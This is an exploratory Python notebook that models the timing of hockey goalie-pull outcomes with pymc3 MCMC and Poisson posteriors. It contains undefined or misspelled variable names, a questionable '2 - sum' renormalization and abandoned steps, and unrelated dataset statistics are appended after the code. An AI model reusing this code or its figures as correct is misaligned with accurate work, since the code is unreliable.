# # Convert into minutes and rescale to fit chart
# x = x / 60
# scale_frac = 0.7
# y_goal_for = y_goal_for / y_goal_for.max() * scale_frac
# y_goal_against = y_goal_against / y_goal_against.max() * scale_frac
# y_no_goal = y_no_goal / y_no_goal.max() * scale_frac
# plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
# plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
# plt.plot(x, y_no_goal, label=r'$P(\rm{no\;goal};\mu_{MCMC})$', color='orange', lw=LW)
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
plt.show()
# Constraints just don't make sense here...
#
# Removing them.
def bayes_model(training_samples) -> pm.model.Model:
"""
Solve for posterior distributions using pymc3
"""
with pm.Model() as model:
# Priors for the mu parameter of the
# Poisson distribution P.
# Note: mu = mean(P)
mu_goal_for = pm.Uniform(
'mu_goal_for', 15*60, 20*60
)
mu_goal_against = pm.Uniform(
'mu_goal_against', 15*60, 20*60
)
mu_no_goal = pm.Uniform(
'mu_no_goal', 15*60, 20*60
)
# Observations to train the model on
obs_goal_for = pm.Poisson(
'obs_goal_for',
mu=mu_goal_for,
observed=training_samples[0],
)
obs_goal_against = pm.Poisson(
'obs_goal_against',
mu=mu_goal_against,
observed=training_samples[1],
)
obs_no_goal = pm.Poisson(
'obs_no_goal',
mu=mu_no_goal,
observed=training_samples[2],
)
# Outcome probabilities
p_goal_for = pm.Bound(pm.Poisson, upper=20*60)('p_goal_for', mu=mu_goal_for)
p_goal_against = pm.Bound(pm.Poisson, upper=20*60)('p_goal_against', mu=mu_goal_against)
p_no_goal = pm.Bound(pm.Poisson, upper=20*60)('p_no_goal', mu=mu_no_goal)
# Fit model
step = pm.Metropolis()
trace = pm.sample(18000, step=step)
return model, trace
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
ALPHA = 0.6
LW = 3
from scipy.stats import poisson
# plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
# color='green', label=r'$P(\rm{goal\;for}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
# plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
# color='red', label=r'$P(\rm{goal\;against}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
''' Plot the MCMC samples '''
plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
color='green', label='p_goal_for samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
color='red', label='p_goal_against samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_no_goal'] / 60, bins=50,
color='orange', label='p_no_goal samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
''' Plot the poisson distributions '''
p = poisson.pmf
x = np.arange(16*60, 22*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
mu_no_goal = burned_trace['mu_no_goal'].mean()
y_goal_for = p(x, mu_goal_for)
y_goal_against = p(x, mu_goal_against)
y_no_goal = p(x, mu_no_goal)
# Convert into minutes and rescale to fit chart
x = x / 60
scale_frac = 0.7
y_goal_for = y_goal_for / y_goal_for.max() * scale_frac
y_goal_against = y_goal_against / y_goal_against.max() * scale_frac
y_no_goal = y_no_goal / y_no_goal.max() * scale_frac
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$P(\rm{no\;goal};\mu_{MCMC})$', color='orange', lw=LW)
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
plt.show()
plt.plot(trace['mu_goal_for'], label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against'], label='mu_goal_against', color='red')
plt.plot(trace['mu_no_goal'], label='mu_no_goal', color='orange')
plt.ylabel('$\mu$ (seconds)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['mu_goal_for'], bins=50,
color='green', label='mu_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_goal_against'], bins=50,
color='red', label='mu_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_no_goal'], bins=50,
color='orange', label='mu_no_goal',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
# Now I need to normalize these guys. I looks like they don't have an even number of samples... let's check on that
(burned_trace['mu_goal_for'].shape,
burned_trace['mu_goal_against'].shape,
burned_trace['mu_no_goal'].shape)
len(burned_trace) * 4
# Nice! Same number of samlpes. Weird that it's 4x my burned trace - probably due to 4 cores
normed_factors = np.array([
training_samples[0].shape,
training_samples[1].shape,
training_samples[2].shape
])
normed_factors = normed_factors / normed_factors.sum()
normed_factors
# Those ^ are the normalizing class probabilties
ALPHA = 0.6
LW = 3
BINS = 60
# plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
# color='green', label=r'$P(\rm{goal\;for}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
# plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
# color='red', label=r'$P(\rm{goal\;against}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
''' Plot the MCMC samples '''
plt.hist(np.random.choice(
burned_trace['p_goal_for'] / 60,
size=int(burned_trace['p_goal_for'].shape[0] * normed_factors[0])
),
bins=BINS, color='green', label='p_goal_for samples',
# density='normed',
histtype='stepfilled', alpha=ALPHA, zorder=3)
plt.hist(np.random.choice(
burned_trace['p_goal_against'] / 60,
size=int(burned_trace['p_goal_against'].shape[0] * normed_factors[1])
),
bins=BINS,
color='red', label='p_goal_against samples',
# density='normed',
histtype='stepfilled', alpha=ALPHA, zorder=2)
plt.hist(np.random.choice(
burned_trace['p_no_goal'] / 60,
size=int(burned_trace['p_no_goal'].shape[0] * normed_factors[2])
),
bins=BINS,
color='orange', label='p_no_goal samples',
# density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('Sampled frequency (normed)')
plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
plt.show()
from scipy.stats import poisson
ALPHA = 0.6
LW = 3
''' Plot the poisson distributions '''
p = poisson.pmf
x = np.arange(16*60, 20*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
mu_no_goal = burned_trace['mu_no_goal'].mean()
y_goal_for = p(x, mu_goal_for) * normed_factors[0]
y_goal_against = p(x, mu_goal_against) * normed_factors[1]
y_no_goal = p(x, mu_no_goal) * normed_factors[2]
# Convert into minutes and rescale to fit chart
x = x / 60
# scale_frac = 0.7
# y_goal_for = y_goal_for / y_goal_for.max() * normed_factors[0]
# y_goal_against = y_goal_against / y_goal_against.max() * normed_factors[1]
# y_no_goal = y_no_goal / y_no_goal.max() * normed_factors[2]
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$P(\rm{no\;goal};\mu_{MCMC})$', color='orange', lw=LW)
# plt.ylabel('Posterior PDF')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
plt.show()
y_goal_for.sum() + y_goal_against.sum() + y_no_goal.sum()
# This is less than 1 because I cut off the tail..
#
# We can easily **correct for this by renormalizing**
cutoff_renormed_factor = 2 - (y_goal_for.sum() + y_goal_against.sum() + y_no_goal.sum())
cutoff_renormed_factor
from scipy.stats import poisson
ALPHA = 0.6
LW = 3
''' Plot the poisson distributions '''
p = poisson.pmf
x = np.arange(16*60, 20*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
mu_no_goal = burned_trace['mu_no_goal'].mean()
y_goal_for = p(x, mu_goal_for) * normed_factors[0]
y_goal_against = p(x, mu_goal_against) * normed_factors[1]
y_no_goal = p(x, mu_no_goal) * normed_factors[2]
cutoff_renormed_factor = 2 - (y_goal_for.sum() + y_goal_against.sum() + y_no_goal.sum())
y_goal_for = y_goal_for * cutoff_renormed_factor
y_goal_against = y_goal_against * cutoff_renormed_factor
y_no_goal = y_no_goal * cutoff_renormed_factor
# Convert into minutes and rescale to fit chart
x = x / 60
# scale_frac = 0.7
# y_goal_for = y_goal_for / y_goal_for.max() * normed_factors[0]
# y_goal_against = y_goal_against / y_goal_against.max() * normed_factors[1]
# y_no_goal = y_no_goal / y_no_goal.max() * normed_factors[2]
plt.plot(x, y_goal_for, label=r'$P(\mathrm{goal\;for}\;|\;X)$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\mathrm{goal\;against}\;|\;X)$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$P(\mathrm{no\;goal}\;|\;X)$', color='orange', lw=LW)
plt.ylabel('Posterior probability')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
plt.show()
y_goal_for.sum() + y_goal_against.sum() + y_no_goal.sum()
print(f'Final normalizing factors =\n{normed_factors * cutoff_renormed_factor}')
mu_mcmc = [
burned_trace['mu_goal_for'].mean(),
burned_trace['mu_goal_against'].mean(),
burned_trace['mu_no_goal'].mean(),
]
print(f'Final values for mu: {mu_mcmc}')
def convert_to_time_remaining(x):
_x = 20 - x
t = datetime.timedelta(seconds=_x*60)
return str(t)
convert_to_time_remaining(x[np.argmax(y_goal_for)])
print('Time of max posterior probability =\n'
f'{x[np.argmax(y_goal_for)], x[np.argmax(y_goal_against)], x[np.argmax(y_no_goal)]}')
print()
t_remaining = [convert_to_time_remaining(x[np.argmax(y_goal_for)]),
convert_to_time_remaining(x[np.argmax(y_goal_against)]),
convert_to_time_remaining(x[np.argmax(y_no_goal)])]
print(f'Time of max posterior probability =\n{t_remaining}')
# Great, now we have properly normalized probabilties.
#
# Notes:
# - From normalizing factors, we can see ~12% chance of scoring when pulling the goalie on average.
# - Probability of scoring peaks at 18.55 mins (1:27 remaining), with other probabilties following close after (01:20 for goal against and 01:07 for no goals)
# From now on we'll **try to** work from the distributions as our source of truth.
#
# Let's plot the cumulative distribution.
model_normlizing_factors = (normed_factors * cutoff_renormed_factor).flatten()
mu_mcmc = [
burned_trace['mu_goal_for'].mean(),
burned_trace['mu_goal_against'].mean(),
burned_trace['mu_no_goal'].mean(),
]
model_normlizing_factors = [
0.1292882,
0.26528024,
0.62489297,
]
mu_mcmc = [
1113.8279468130681,
1120.1830172722719,
1133.9420018554083
]
from scipy.stats import poisson
p = poisson.pmf
x = np.arange(16*60, 20*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
mu_no_goal = burned_trace['mu_no_goal'].mean()
y_goal_for = p(x, mu_goal_for) * normed_factors[0]
y_goal_against = p(x, mu_goal_against) * normed_factors[1]
y_no_goal = p(x, mu_no_goal) * normed_factors[2]
cutoff_renormed_factor = 2 - (y_goal_for.sum() + y_goal_against.sum() + y_no_goal.sum())
y_goal_for = y_goal_for * cutoff_renormed_factor
y_goal_against = y_goal_against * cutoff_renormed_factor
y_no_goal = y_no_goal * cutoff_renormed_factor
y_goal_for.sum() + y_goal_against.sum() + y_no_goal.sum()
# ---
#
# Trying to figure out the standard error on the odds estimate
# https://stats.stackexchange.com/a/15373/130459
#
# $$
# odds = P(goal\;for)\;/\;(P(goal\;against) * P(no\;goal))
# $$
std_err = lambda mu, n: np.sqrt(mu/n)
std_err(mu_mcmc[0], 1), std_err(mu_mcmc[0], 10), std_err(mu_mcmc[0], 100)
# This is tricky...
#
# ---
#
# #### 2018-03-10
#
# Let's go back to the drawing board and add some things to the model.
#
# $$
# \alpha \cdot \big[ P(goal\;for) + (P(goal\;against) + P(no\;goal)\big] = 1 \\
# \vdots \\
# \alpha = \big[ P(goal\;for) + (P(goal\;against) + P(no\;goal)\big]^{-1}
# $$
#
# This will allow us to re-weight the posteriors later, so we can compare them better and yield a different interpretation.
# Adding in
# - MAP starting points
# - $\alpha$ constraint param
def bayes_model(training_samples) -> pm.model.Model:
"""
Solve for posterior distributions using pymc3
"""
with pm.Model() as model:
# Priors for the mu parameter of the
# Poisson distribution P.
# Note: mu = mean(P)
mu_goal_for = pm.Uniform(
'mu_goal_for', 15*60, 20*60
)
mu_goal_against = pm.Uniform(
'mu_goal_against', 15*60, 20*60
)
mu_no_goal = pm.Uniform(
'mu_no_goal', 15*60, 20*60
)
# Observations to train the model on
obs_goal_for = pm.Poisson(
'obs_goal_for',
mu=mu_goal_for,
observed=training_samples[0],
)
obs_goal_against = pm.Poisson(
'obs_goal_against',
mu=mu_goal_against,
observed=training_samples[1],
)
obs_no_goal = pm.Poisson(
'obs_no_goal',
mu=mu_no_goal,
observed=training_samples[2],
)
# Outcome probabilities
BoundPoisson = lambda name, mu: pm.Bound(pm.Poisson, upper=20*60)(name, mu=mu)
p_goal_for = BoundPoisson('p_goal_for', mu=mu_goal_for)
p_goal_against = BoundPoisson('p_goal_against', mu=mu_goal_against)
p_no_goal = BoundPoisson('p_no_goal', mu=mu_no_goal)
# Constraint parameter for re-weighting
# posterior samples
alpha = pm.Deterministic(
'alpha',
1 / (p_goal_for + p_goal_against + p_no_goal)
)
# Fit model
start = pm.find_MAP()
step = pm.Metropolis()
trace = pm.sample(18000, step=step, start=start)
return model, trace
model, trace = bayes_model(training_samples)
model
# > UserWarning: find_MAP should not be used to initialize the NUTS sampler, simply call pymc3.sample() and it will automatically initialize NUTS in a better way.
#
# Let's not use MAP
N_burn = 10000
burned_trace = trace[N_burn:]
from typing import Tuple
from scipy.stats import poisson
def poisson_posterior(
mu=None,
norm_factors=None,
) -> Tuple[np.ndarray]:
p = poisson.pmf
x = np.arange(15*60, 20*60, 1)
if mu is None:
return (x / 60,)
mu_goal_for = mu[0]
mu_goal_against = mu[1]
mu_no_goal = mu[2]
y_goal_for = p(x, mu_goal_for)
y_goal_against = p(x, mu_goal_against)
y_no_goal = p(x, mu_no_goal)
if norm_factors is not None:
y_goal_for = p(x, mu_goal_for) * norm_factors[0]
y_goal_against = p(x, mu_goal_against) * norm_factors[1]
y_no_goal = p(x, mu_no_goal) * norm_factors[2]
# Convert into minutes
x = x / 60
return x, y_goal_for, y_goal_against, y_no_goal
ALPHA = 0.6
LW = 3
''' Plot MCMC samples '''
plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
color='green', label='p_goal_for samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
color='red', label='p_goal_against samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_no_goal'] / 60, bins=50,
color='orange', label='p_no_goal samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
''' Plot poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior([
burned_trace['mu_goal_for'].mean(),
burned_trace['mu_goal_against'].mean(),
burned_trace['mu_no_goal'].mean(),
])
# Rescale
scale_frac = 0.7
y_goal_for = y_goal_for / y_goal_for.max() * scale_frac
y_goal_against = y_goal_against / y_goal_against.max() * scale_frac
y_no_goal = y_no_goal / y_no_goal.max() * scale_frac
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$P(\rm{no\;goal};\mu_{MCMC})$', color='orange', lw=LW)
''' Clean up the chart '''
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
savefig(plt, 'time_elapsed_poisson_mcmc_samples')
plt.show()
plt.plot(trace['mu_goal_for']/60, label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against']/60, label='mu_goal_against', color='red')
plt.plot(trace['mu_no_goal']/60, label='mu_no_goal', color='orange')
plt.ylabel('$\mu$ (minutes)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend()
savefig(plt, 'time_elapsed_mu_steps')
plt.show()
ALPHA = 0.6
plt.hist(burned_trace['alpha']/60, bins=50,
color='b', label=r'$\alpha$',
histtype='stepfilled', alpha=ALPHA)
# plt.ylabel('MCMC counts')
# plt.xlabel('$\mu$ (minutes)')
plt.legend()
# savefig(plt, 'time_elapsed_mu_samples')
plt.show()
# THis is not really working out...
# ---
#
# Determine $\alpha$ from the normalized poisson distributions
model_normlizing_factors = [
0.1292882,
0.26528024,
0.62489297,
]
mu_mcmc = [
1113.8279468130681,
1120.1830172722719,
1133.9420018554083
]
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(
mu_mcmc, norm_factors=model_normalizing_factors
)
alpha = np.power(
np.sum([y_goal_for, y_goal_against, y_no_goal], axis=0),
-1
)
plt.plot(x, alpha, label=r'$\alpha$', lw=LW)
plt.ylabel('Alpha re-weighting parameter')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
# savefig(plt, 'time_elapsed_poisson_cdf')
plt.show()
from scipy.stats import poisson
ALPHA = 0.6
LW = 3
''' Plot the poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(
mu_mcmc, norm_factors=model_normalizing_factors
)
# Alpha has same shape as x, y above
alpha = np.power(
np.sum([y_goal_for, y_goal_against, y_no_goal], axis=0),
-1
)
y_goal_for = alpha * y_goal_for
y_goal_against = alpha * y_goal_against
y_no_goal = alpha * y_no_goal
plt.plot(x, y_goal_for, label=r'$\alpha \cdot P(\mathrm{goal\;for}\;|\;X)$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$\alpha \cdot P(\mathrm{goal\;against}\;|\;X)$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$\alpha \cdot P(\mathrm{no\;goal}\;|\;X)$', color='orange', lw=LW)
plt.ylabel('Chance of outcome at time $t$')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
savefig(plt, 'time_elapsed_outcome_chance_timeseries')
plt.show()
# Note how there are very few samples to draw conclusions from for the low and high times.
#
# e.g. less than 17
np.sum(training_samples[0] < 17*60) + np.sum(training_samples[1] < 17*60) + np.sum(training_samples[2] < 17*60)
# more than 17
np.sum(training_samples[0] > 17*60) + np.sum(training_samples[1] > 17*60) + np.sum(training_samples[2] > 17*60)
# Let's bring back $\mu$
plt.hist(burned_trace['mu_goal_for'])
plt.hist(burned_trace['mu_goal_against'])
plt.hist(burned_trace['mu_no_goal'])
# To get some idea of the uncertainty we need to figure out the uncertainty on $P$. We can do this using the knowledge of the uncertainty on $\mu$, as calculated with MCMC.
#
# $$
# \sigma_P = \big| \frac{\partial P}{\partial \mu} \big|\;\sigma_{\mu}
# $$
#
# where $\sigma_{\mu}$ is the error on mu. This error can be calculated from the MCMC samples
mu_mcmc_std = [
burned_trace['mu_goal_for'].std(),
burned_trace['mu_goal_against'].std(),
burned_trace['mu_no_goal'].std(),
]
mu_mcmc_std
# Now we need to evaluate the derivative:
# $$
# \frac{\partial P}{\partial \mu}
# $$
# Trying the analytic derivative
#
#
# $$
# \frac{\partial p}{\partial \mu} = \frac{e^{-\mu} (t - \mu) \cdot \mu^{t-1} }{t!}
# $$
#
# we can calcualte $\sigma_p$ as done below
mu_mcmc
mu_mcmc_std
model_normalizing_factors
x = poisson_posterior()[0]
x[:10]
from scipy.special import factorial
def poisson_derivative(mu, t):
return np.exp(-mu) * (t - mu) * np.power(mu, (t-1)) / factorial(t, exact=True)
mu = mu_mcmc[0]
poisson_derivative(mu, t=int(mu))
# Ahhh! These factorials are not nice
from scipy.special import factorial
def poisson_derivative(mu, t):
return np.exp(-mu) * (t - mu) * np.power(mu, (t-1)) / factorial(t)
def calc_posteror_error(mu, mu_std, norm_fac):
x = poisson_posterior()[0] * 60
return mu_std * np.array([
norm_fac * poisson_derivative(mu, int(t))
for t in tqdm_notebook(x)
])
err_p_goal_for = calc_posteror_error(mu_mcmc[0], mu_mcmc_std[0], model_normalizing_factors[0])
err_p_goal_against = calc_posteror_error(mu_mcmc[1], mu_mcmc_std[1], model_normalizing_factors[1])
err_p_no_goal = calc_posteror_error(mu_mcmc[2], mu_mcmc_std[2], model_normalizing_factors[2])
err_p_goal_for
# I think the factorial is causing issues
# plt.hist(err_p_goal_for, bins=100)
# Assuming the error is randonly distributed and calculating 95% confidence intervals ($\pm$1.96$\sigma$)...
from scipy.stats import poisson
ALPHA = 0.6
ALPHA_LIGHT = 0.3
LW = 3
ERR_BAR_CUTOFF = 0
''' Plot the poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(
mu_mcmc, norm_factors=model_normalizing_factors
)
# Alpha has same shape as x, y above
alpha = np.power(
np.sum([y_goal_for, y_goal_against, y_no_goal], axis=0),
-1
)
y_goal_for = alpha * y_goal_for
# y_goal_against = alpha * y_goal_against
# y_no_goal = alpha * y_no_goal
plt.plot(x, y_goal_for, label=r'$\alpha \cdot P(\mathrm{goal\;for}\;|\;X)$', color='green', lw=LW)
# plt.plot(x, y_goal_against, label=r'$\alpha \cdot P(\mathrm{goal\;against}\;|\;X)$', color='red', lw=LW)
# plt.plot(x, y_no_goal, label=r'$\alpha \cdot P(\mathrm{no\;goal}\;|\;X)$', color='orange', lw=LW)
plt.plot(x[ERR_BAR_CUTOFF:],
(alpha*(err_p_goal_for + err_p_goal_for*1.96))[ERR_BAR_CUTOFF:],
label='goal for 95% CI', color='green', alpha=ALPHA_LIGHT)
plt.plot(x[ERR_BAR_CUTOFF:],
(alpha*(err_p_goal_for - err_p_foal_for*1.96))[ERR_BAR_CUTOFF:],
label='goal for 95% CI', color='green', alpha=ALPHA_LIGHT)
plt.ylabel('Chance of outcome at time $t$')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
# savefig(plt, 'time_elapsed_outcome_chance_timeseries')
plt.show()
# ^ Ignore
# Let's take the numerical derivative instead
import inspect
print(inspect.getsource(poisson_posterior))
from scipy.misc import derivative
from tqdm import tqdm_notebook
def calc_posteror_error(mu, mu_std, mu_step=1e-6):
x = poisson_posterior()[0] * 60 # convert back into seconds (discrete)
err = mu_std * np.abs(np.array([
derivative(lambda _mu: poisson.pmf(int(t), _mu), mu, dx=mu_step)
for t in tqdm_notebook(x)
]))
return err
err_p_goal_for = calc_posteror_error(mu_mcmc[0], mu_mcmc_std[0])
err_p_goal_for
x = poisson_posterior()[0] * 60
plt.plot(x, err_p_goal_for)
ALPHA = 0.6
ALPHA_LIGHT = 0.3
LW = 3
''' Poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(mu_mcmc, norm_factors=normlizing_factors)
''' Errors '''
err_goal_for = calc_posteror_error(mu_mcmc[0], mu_mcmc_std[0]) * normlizing_factors[0]
err_bar_top = y_goal_for + err_goal_for
err_bar_bottom = y_goal_for - err_goal_for
''' Plot '''
# plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
# plt.fill_between(err_bar_bottom, err_bar_top, alpha=ALPHA_LIGHT, color='green')
plt.plot(x, err_goal_for)
plt.plot(x, err_bar_top)
plt.plot(x, err_bar_bottom)
''' Clean up the chart '''
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
# savefig(plt, 'time_elapsed_poisson_mcmc_samples')
plt.show()
ALPHA = 0.6
ALPHA_LIGHT = 0.3
LW = 3
''' Poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(mu_mcmc, norm_factors=normlizing_factors)
''' Errors '''
err_goal_for = calc_posteror_error(mu_mcmc[0], mu_mcmc_std[0]) * normlizing_factors[0]
err_bar_top = y_goal_for + err_goal_for
err_bar_bottom = y_goal_for - err_goal_for
''' Plot '''
# plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.fill_between(x, err_bar_bottom, err_bar_top, alpha=ALPHA_LIGHT, color='green')
# plt.plot(x, err_goal_for)
# plt.plot(x, err_bar_top)
# plt.plot(x, err_bar_bottom)
''' Clean up the chart '''
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
# savefig(plt, 'time_elapsed_poisson_mcmc_samples')
plt.show()
# So that's the error estimate as derived from uncertainty in $\mu$! Pretty cool.
#
# Now we can do $\sigma_\alpha = \alpha \cdot \sigma_P$
from scipy.stats import poisson
ALPHA = 0.6
ALPHA_LIGHT = 0.3
LW = 3
''' Plot the poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(
mu_mcmc, norm_factors=model_normalizing_factors
)
# Alpha has same shape as x, y above
alpha = np.power(
np.sum([y_goal_for, y_goal_against, y_no_goal], axis=0),
-1
)
y_goal_for = alpha * y_goal_for
y_goal_against = alpha * y_goal_against
y_no_goal = alpha * y_no_goal
plt.plot(x, y_goal_for, label=r'$\alpha \cdot P(\mathrm{goal\;for}\;|\;X)$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$\alpha \cdot P(\mathrm{goal\;against}\;|\;X)$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$\alpha \cdot P(\mathrm{no\;goal}\;|\;X)$', color='orange', lw=LW)
''' Plot the errors '''
err_p_goal_for = alpha * calc_posteror_error(mu_mcmc[0], mu_mcmc_std[0])
err_p_goal_against = alpha * calc_posteror_error(mu_mcmc[1], mu_mcmc_std[1])
err_p_no_goal = alpha * calc_posteror_error(mu_mcmc[2], mu_mcmc_std[2])
plt.fill_between(x, y_goal_for-err_p_goal_for, y_goal_for+err_p_goal_for,
color='green', alpha=ALPHA_LIGHT)
plt.fill_between(x, y_goal_against-err_p_goal_against, y_goal_against+err_p_goal_against,
color='red', alpha=ALPHA_LIGHT)
plt.fill_between(x, y_no_goal-err_p_no_goal, y_no_goal+err_p_no_goal,
color='orange', alpha=ALPHA_LIGHT)
plt.ylabel('Chance of outcome at time $t$')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
# savefig(plt, 'time_elapsed_outcome_chance_timeseries')
plt.show()
# We can't say anything conclusive due to huge errors on low times, but we are much more confident on late game predictions
from scipy.stats import poisson
ALPHA = 0.6
ALPHA_LIGHT = 0.3
LW = 3
''' Plot the poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(
mu_mcmc, norm_factors=model_normalizing_factors
)
# Alpha has same shape as x, y above
alpha = np.power(
np.sum([y_goal_for, y_goal_against, y_no_goal], axis=0),
-1
)
y_goal_for = alpha * y_goal_for
y_goal_against = alpha * y_goal_against
y_no_goal = alpha * y_no_goal
plt.plot(x, y_goal_for, label=r'$\alpha \cdot P(\mathrm{goal\;for}\;|\;X)$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$\alpha \cdot P(\mathrm{goal\;against}\;|\;X)$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$\alpha \cdot P(\mathrm{no\;goal}\;|\;X)$', color='orange', lw=LW)
''' Plot the errors '''
err_p_goal_for = alpha * calc_posteror_error(mu_mcmc[0], mu_mcmc_std[0])
err_p_goal_against = alpha * calc_posteror_error(mu_mcmc[1], mu_mcmc_std[1])
err_p_no_goal = alpha * calc_posteror_error(mu_mcmc[2], mu_mcmc_std[2])
plt.fill_between(x, y_goal_for-err_p_goal_for, y_goal_for+err_p_goal_for,
color='green', alpha=ALPHA_LIGHT)
plt.fill_between(x, y_goal_against-err_p_goal_against, y_goal_against+err_p_goal_against,
color='red', alpha=ALPHA_LIGHT)
plt.fill_between(x, y_no_goal-err_p_no_goal, y_no_goal+err_p_no_goal,
color='orange', alpha=ALPHA_LIGHT)
plt.ylabel('Chance of outcome at time $t$')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.xlim(17, 20)
plt.ylim(0, 1)
plt.legend()
# savefig(plt, 'time_elapsed_outcome_chance_timeseries')
plt.show()
from IPython.display import HTML
HTML('<style>div.text_cell_render{font-size:130%;padding-top:50px;padding-bottom:50px}</style>')
| 28.868236
| 412
| 0.66356
| 8,990
| 57,621
| 4.018354
| 0.07564
| 0.062394
| 0.023917
| 0.023917
| 0.776111
| 0.749398
| 0.734478
| 0.721522
| 0.713661
| 0.704526
| 0
| 0.025408
| 0.187189
| 57,621
| 1,995
| 413
| 28.882707
| 0.745917
| 0.257215
| 0
| 0.734104
| 0
| 0.001927
| 0.172625
| 0.032823
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.031792
| null | null | 0.014451
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56f4bfc4cc61d78dd2c0a590d62107f1f27e2d54
| 33
|
py
|
Python
|
src/error_analysis.py
|
exue026/spam-detection-model
|
1a8afc4b4403ef49d8ebbdb5fbcb56c643996b1d
|
[
"MIT"
] | null | null | null |
